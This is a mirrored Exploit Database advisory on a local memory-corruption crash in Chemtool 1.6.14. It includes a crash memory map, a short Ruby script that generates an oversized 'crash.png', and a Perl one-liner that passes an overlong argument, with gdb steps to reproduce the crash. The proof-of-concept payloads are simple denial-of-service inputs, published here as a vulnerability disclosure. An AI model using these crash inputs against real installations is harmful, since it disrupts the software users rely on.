Chemtool 1.6.14 – Memory Corruption

• Exploit Database
• 16 阅读

• 作者： Pablo González
  日期： 2015-02-08
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/36024/

• Document Title:
  ===============
  Chemtool 1.6.14 Memory Corruption Vulnerability
  
  Date:
  =============
  08/02/2015
  
  Vendor Homepage:
  ================
  http://ruby.chemie.uni-freiburg.de/~martin/chemtool/
  
  Abstract Advisory Information:
  ==============================
  Memory Corruption Vulnerability on Chemtool 1.6.14.
  
  Affected Product(s):
  ====================
  Chemtool 1.6.14 or older
  
  Exploitation Technique:
  =======================
  Local
  
  Severity Level:
  ===============
  Medium
  
  Technical Details & Description:
  ================================
  A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An
  attacker can crash the software by using an input file.
  Also, an attacker can crash the software by entering a filename too long.
  
  b77a8000-b77a9000 r--s 00000000 08:01 152558
  /var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
  b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
  b77aa000-b77bb000 r-xp 00000000 08:01 393480
  /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
  b77bb000-b77bc000 r--p 00010000 08:01 393480
  /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
  b77bc000-b77bd000 rw-p 00011000 08:01 393480
  /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
  b77bd000-b77be000 rwxp 00000000 00:00 0
  b77be000-b77bf000 r--p 00855000 08:01 274691
  /usr/lib/locale/locale-archive
  b77bf000-b77c0000 r--p 00596000 08:01 274691
  /usr/lib/locale/locale-archive
  b77c0000-b77c2000 rw-p 00000000 00:00 0
  b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
  b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
  ld-2.19.so
  b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
  ld-2.19.so
  b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
  ld-2.19.so
  bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
  Aborted (core dumped)
  
  Proof of Concept (PoC):
  =======================
  This vulnerabilities can be exploited by local attackers with
  userinteraction.
  
  First test. Attacker can generate a malicious file (format .png).This file
  can produced a Stack Smashing.
  
  #/usr/bin/ruby
  
  buf = "a"*3000
  
  filename = "crash.png"
  file = open(filename,'w')
  file.write(buf)
  file.close
  puts "file created!"
  
  Second test. Attacker can enter a filename too long. For example, this
  program needs recieve a parameter. If this parameter is too long, It will
  crash.
  
  $chemtool $(perl -e 'print "A"x900')
  
  How to perform:
  =======================
  1) You can test it with gdb. You attach this application.
  2) Run it, now, you can move "crash.png" file that we generated by our ruby
  script to the application. Also, you can run argv[1] with a long value.
  
  When you perform above steps so application will crash. Analyze it on gdb.
  
  Solution - Fix & Patch:
  =======================
  Restrict working maximum size. I believe that this bug doesn't have
  solution.
  
  Security Risk:
  ==============
  The security risk of the vulnerability is estimated as medium because of
  the local crash method.
  
  Authors:
  ==================
  Pablo González